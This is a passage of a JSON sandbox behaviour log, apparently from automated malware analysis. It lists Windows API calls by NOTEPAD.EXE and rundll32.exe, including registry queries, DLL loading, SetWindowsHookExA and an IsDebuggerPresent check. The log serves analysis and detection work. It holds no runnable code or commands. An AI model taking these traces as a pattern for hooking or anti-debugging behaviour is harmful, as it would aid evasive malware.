"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "WriteConsoleW"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "LdrGetDllHandle"}, {"category": "process", "timestamp": "2016-02-16 17:41:36,324", "api": "ExitProcess"}]}, {"parent_id": 1592, "process_name": "NOTEPAD.EXE", "process_id": 592, "first_seen": "2016-02-16 17:42:07,850", "calls": [{"category": "misc", "timestamp": "2016-02-16 17:42:07,900", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,900", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:07,900", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,910", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,920", "api": "LdrLoadDll"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:07,920", "api": "NtCreateMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,920", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,920", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "SetWindowsHookExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "SetWindowsHookExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,990", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,990", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,990", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,990", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:07,990", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,000", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,000", "api": "ZwMapViewOfSection"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,000", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,000", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,000", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,010", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,010", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,010", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,010", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,020", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,020", "api": "LdrGetDllHandle"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,020", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,020", "api": "GetSystemMetrics"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,020", "api": "GetSystemMetrics"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,020", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,020", "api": "NtQueryInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,020", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,030", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,030", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,040", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,040", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,050", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,050", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,060", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "windows", "timestamp": "2016-02-16 17:42:08,070", "api": "FindWindowA"}]}, {"parent_id": 1592, "process_name": "rundll32.exe", "process_id": 308, "first_seen": "2016-02-16 17:42:07,930", "calls": [{"category": "filesystem", "timestamp": "2016-02-16 17:42:07,940", "api": "NtOpenFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,940", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,940", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,980", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,980", "api": "NtOpenFile"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "IsDebuggerPresent"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", 